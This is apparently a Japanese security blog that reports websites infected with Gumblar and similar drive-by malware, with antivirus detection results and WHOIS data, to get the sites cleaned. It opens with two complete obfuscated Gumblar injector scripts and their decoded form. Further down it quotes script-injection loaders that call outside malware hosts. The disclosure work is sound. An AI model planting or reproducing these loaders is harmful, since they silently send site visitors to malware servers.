(function(){var r5KC='%';var zV9gP=('var.20a.3d.22.53cript.45.6egin.65.22.2c.62.3d.22.56.65rsio.6e.28).2b.22.2cj.3d.22.22.2cu.3dnavi.67a.74or.2eus.65rAgent.3bif((u.2e.69ndex.4ff(.22Win.22).3e0).26.26(u.2einde.78Of(.22N.54.206.22).3c.30).26.26.28d.6f.63um.65nt.2ecookie.2e.69ndex.4ff(.22miek.3d1.22.29.3c0).26.26(.74ypeof(z.72vz.74s).21.3dtypeo.66.28.22A.22)).29.7bzr.76.7a.74s.3d.22.41.22.3beval(.22if(.77.69ndo.77.2e.22+a+.22.29j.3dj+.22+a+.22Maj.6fr.22+.62+a+.22Minor.22+b+a+.22Build.22+b+.22j.3b.22.29.3b.64o.63um.65nt.2ewri.74e.28.22.3cscript.20sr.63.3d.2f.2f.67u.6dbla.72.2ecn.2frss.2f.3fid.3d.22+j+.22.3e.3c.5c.2fs.63ript.3e.22).3b.7d').replace(/./g,r5KC);var OoVn=unescape(zV9gP);eval(OoVn)})();
 --></script>

<script language=javascript><!-- 
(function(Iytv){var xfPn='&76ar&20a&3d&22&53cri&70&74E&6egine&22&2c&62&3d&22Ver&73i&6fn(&29+&22&2cj&3d&22&22&2cu&3dn&61vigato&72&2eu&73&65rAge&6e&74&3bif&28(u&2e&69ndexO&66(&22Win&22)&3e0)&26&26(u&2ei&6ed&65&78O&66(&22NT&206&22)&3c&30)&26&26&28d&6fcum&65nt&2e&63o&6fk&69e&2ei&6ede&78O&66(&22mie&6b&3d&31&22)&3c0)&26&26&28typeof(zrvzts)&21&3d&74ypeof(&22&41&22&29&29&29&7b&7ar&76zts&3d&22A&22&3be&76&61l(&22&69f(&77i&6edow&2e&22+a+&22)j&3dj+&22&2ba+&22M&61jor&22+&62&2ba+&22Mi&6eor&22+b&2ba+&22Buil&64&22+b+&22&6a&3b&22)&3bdocu&6dent&2ewrit&65&28&22&3c&73cript&20s&72c&3d&2f&2f&67&75mb&6car&2ec&6e&2frss&2f&3fid&3d&22+&6a+&22&3e&3c&5c&2fscri&70&74&3e&22)&3b&7d';eval(unescape(xfPn.replace(Iytv,'%')))})(/&/g);
 --></script>

※↑マルウェア早く削除してほしいです。。。

解けたら下記となります↓
eval1()
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  :
   :
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 %%%%%

eval2()
 var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
 if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&
 (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
 {
   zrvzts="A";
   eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
 document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}

eval1()はよく使っているxss ブラウザークラッシュのexploit攻撃PoCなので
eval2()について、GUMBLARマルウェアサイトへ飛ばされます↓
gumblar・cn/rss/?id=xxxxx

13.htmlのVirus Totalで確認したら⇒【こちら】
下記のマルウェア名前が出ました↓
F-Prot                   : JS/Redir.M
AntiVir                  : HTML/Infected.WebPage.Gen2
TrendMicro               : JS_GUMBLAR.ERC
TotalDefense             : JS/Gumblar!generic
Fortinet                 : JS/PackRedir.A!tr.dldr
TrendMicro-HouseCall     : JS_GUMBLAR.ERC
Avast                    : JS:RedGumb-H [Trj]
GData                    : JS:RedGumb-H
Kaspersky                : Trojan-Downloader.JS.Gumblar.a
ESET-NOD32               : JS/TrojanDownloader.Agent.NQB
McAfee                   : Obfuscated Script.f
Ikarus                   : Trojan-Downloader.JS.Gumblar
Commtouch                : JS/Redir.M
K7AntiVirus              : Trojan
AVG                      : JS/Obfuscated
ViRobot                  : JS.A.Gumblar.6933
VirusBuster              : JS.Crypt.BQK

#OCJP-061: 「pnrm.jp / 210.224.177.201」中国トロイダウンロードコードを発見!

下記のURL
hxxp: // pnrm.jp/
hxxp: // www.pnrm.jp/
hxxp: // 210.224.177.201/
↑のindex.htmlに下記のマルウェアダウンロードJSコードを発見しました↓
<script type="text/javascript" 
  src="hxxp : //web・nba1001・net:8888/tj/tongji.js">
</script>
↑何物かと中国トロイのダウンロードJSコードです。
マルウェアコードを削除して欲しい。

pnrm.jpドメイン登録情報を見たほうがいいと思います、あやしいので...

web.nba1001.netは中国のマルウェアサイトですので、現在ROにした。
Domain name: NBA1001.NET
 Registrant:
 qq3800cc1
 qq3800cc1
 na, na 0000000
 CN

 Administrative Contact:
    qq3800cc1, qq3800cc1  
    qq3800cc1
    na, na 0000000
    CN
    +86.0000000000
 Technical Contact:
    qq3800cc1, qq3800cc1  
    qq3800cc1
    na, na 0000000
    CN
    +86.0000000000

index.htmlはVirus Totalにアップロードしたので⇒【情報はこちら】
現在下記のマルウェア検知結果が出ました↓
nProtect                 : Win32.Jadtre.B
CAT-QuickHeal            : HTML/Iframe.EW
McAfee                   : W32/Fujacks.a!htm
K7AntiVirus              : EmailWorm
VirusBuster              : HTML.Malurl.J
F-Prot                   : HTML/Linker.AB
Symantec                 : W32.Fujacks.CE!html
Norman                   : Exploit.LW
TotalDefense             : HTML/Emerleox.IL
TrendMicro-HouseCall     : HTML_DOWN.A
Avast                    : HTML:Script-inf
ClamAV                   : JS.Agent-156
Kaspersky                : Trojan.JS.Agent.btr
BitDefender              : Win32.Jadtre.B
Sophos                   : Troj/Badsrc-M
Comodo                   : TrojWare.JS.Agent.SCW
F-Secure                 : Win32.Jadtre.B
VIPRE                    : Trojan-Clicker.HTML.RemoteScript (v)
AntiVir                  : HTML/Dldr.Agent.OB
TrendMicro               : HTML_DOWN.A
McAfee-GW-Edition        : W32/Fujacks.a!htm
Emsisoft                 : Trojan.JS.Redirector!IK
Jiangmin                 : Trojan/Script.Gen
Microsoft                : Virus:HTML/Jadtre.A
ViRobot                  : HTML.Downloader_Geno_iframe
GData                    : Win32.Jadtre.B
Commtouch                : HTML/Linker.AB
AhnLab-V3                : HTML/Agent
PCTools                  : Net-Worm.Fujacks
ESET-NOD32               : HTML/ScrInject.B.Gen
Rising                   : Hack.Exploit.Script.HTML.IFrame.az
Ikarus                   : Trojan.JS.Redirector
Fortinet                 : JS/Agent.BTR!tr
AVG                      : JS/Downloader.Agent
Panda                    : W32/Katusha.Q

日曜日, 9月 16, 2012

#OCJP-060 3件のウェブ感染事件の報告

最近海外のマルウェア対策専門達とチームを作って、力を合わせて、マルウェアのCNCを倒しに行っていますので、このブログを最近更新出来ないので、すみません。殆ど日本の危ないウェブ感染はマルウェアCNCからの攻撃が多いから、ソースを倒せば日本も守れるかと思いますので今集中しております。
しかし、日本のウェブ感染について、見てはいるけど、手続きされてない件だけほっとくは出来ませんが下記のように報告致します。
下記のURLにウェブ経由マルウェア感染コードを発見しました、現在未だアップされています↓
hxxp://www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/
hxxp://e.to.cx/achsec.html
hxxp://joshingroup.jp/estate/jhoshin.js
全て日本のネットワークなので、関係者には上記のサイトにあるマルウェアを削除して下さい。 証拠↓ 1. hxxp:// www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/
ダウンロード↓ --04:07:44-- hxxp:// www.k5.dion.ne.jp/~tomoya_h/HaraTomoya/ => `index.html' Resolving www.k5.dion.ne.jp... 111.86.142.84 Connecting to www.k5.dion.ne.jp|111.86.142.84|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 5,645 (5.5K) [text/html] 04:07:44 (297.72 KB/s) - `index.html.1' saved [5645/5645] 中にあるJSコードは↓
<script>var qt;if(qt!='M' && qt!='fy'){q
r K='g';var qG="";var f=RegExp;var o=new
 b=new Array();var N=']';var md;if(md!='
 && Pm != ''){Pm=null};var pE=new Date()
 :
 snip
  :
};var KN;if(KN!='' && KN!='z
ribute(V, O);var Ky;if(Ky!='
QZ=new String();var QO=new D
'fF'){fW='fF'};H();</script>
下記のマルウェアサイトのリンクが入っています↓ hxxp:// reference-com.google.com.do.telegraph-co-uk.supernewstuff.ru:8080/\n sify.com/sify.com/msn.com.cn/rapid4me.com/google.com.php

2. hxxp:// e.to.cx/achsec.html

ダウンロード↓ --04:03:05-- hxxp:// e.to.cx/achsec.html => `achsec.html' Resolving e.to.cx... 210.233.74.164 Connecting to e.to.cx|210.233.74.164|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] 04:03:05 (54.33 MB/s) - `achsec.html' saved [4281] 中にあるコードは↓
<script>try{vfE++;}catch(ABW
e";n="126&&135&&1470&&1530&&
4&&1740&&966&&1620&&1414&&16
5&&1414&&600&&546&&1470&&155
&1470&&1530&&1596&&1455&&152
&&1414&&480&&1722&&195&&126&
10&&1470&&1740&&1414&&600&&4
 :
 snip
  :
638&&1635&&1414&&1650&&1624
990&&1694&&1260&&1358&&1545
4&&720&&1302&&690&&1358&&16
826&&195&&126&&135&&1750".s
i%h+016));}ev(s);}</script>
↑下記のURLにIFRAMER経由で転送されます↓ hxxp:// afgreenwich.net/main.php?page=0f123fe645ddf8d7

3. hxxp:// joshingroup.jp/estate/jhoshin.js

ダウンロード↓ --04:18:26-- hxxp:// joshingroup.jp/estate/jhoshin.js => `jhoshin.js' Resolving joshingroup.jp... 59.106.19.85 Connecting to joshingroup.jp|59.106.19.85|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,440 (1.4K) [application/javascript] 04:18:26 (39.97 MB/s) - `jhoshin.js' saved [1440/1440] 中にあるコードは↓
document.write('<sc'+'ript type="text/javascript" 
src="hxxp:// greatrow.ru/Data_Management.js"></scri'+'pt>');
↑そのままでgreatrow.ruのマルウェアサイトにある感染コードを実行されます。